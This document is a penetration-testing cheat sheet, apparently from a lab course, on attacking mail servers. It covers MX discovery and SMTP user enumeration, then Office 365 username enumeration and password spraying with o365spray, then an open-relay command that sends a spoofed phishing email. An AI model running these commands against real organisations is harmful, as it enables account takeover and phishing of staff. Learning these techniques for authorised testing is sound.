A mail server is a server that handles and delivers email over a network, usually over the Internet. A mail server can receive emails from a client device and them to other mail servers.
Email servers enumeration require us to look at multiple servers, ports, and services. Most companies have their email services in the cloud with services such as Microsoft 365 or G-suite.
Some important ports to note for mail servers:
| Port | Service |
|---|---|
TCP/25 | SMTP Unencrypted |
TCP/143 | IMAP4 Unencrypted |
TCP/110 | POP3 Unencrypted |
TCP/465 | SMTP Encrypted |
TCP/587 | SMTP Encrypted/STARTTLS |
TCP/993 | IMAP4 Encrypted |
TCP/995 | POP3 Encrypted |
Mail Server Discovery
We can use MX DNS records to identify a mail server. The MX records specifies the mail server responsible for accepting email messages on behalf of a domain name. Multiple of these records can exist.
# View MX records
host -t MX hackthebox.eu
# or
dig mx inlanefreight.com | grep "MX" | grep -v ";"
# A records
host -t A mail1.inlanefreight.htbSMTP User Enumeration
Use SMTP commands manually first, then automate with a user list when the server allows it.
# connect to SMTP server
telnet 10.10.110.20 25
# list users on the mail server
VRFY root
# list all users on a distribution list
EXPN support-team
# identify the recipient of the email message
RCPT TO:julio
# automated
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7POP3 User Check
# enumerate users
USER julioCloud Enumeration and Spray
Cloud providers use their own implementation for email services. Those services have custom features that can be abused.
# validate domain
python3 o365spray.py --validate --domain msplaintext.xyz
# identify usernames
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz
# password spraying
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyzOpen Relay Abuse
Unauthenticated Email Relay allow email from any source to be transparently re-routed through the open relay server. This behavior masks the source of the messages and make it look like the mail originated from the open relay server.
As an attacker we can abuse this for phishing by sending emails as non-existing users or spoofing someone else’s email.
# connect to mail server and send mail
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213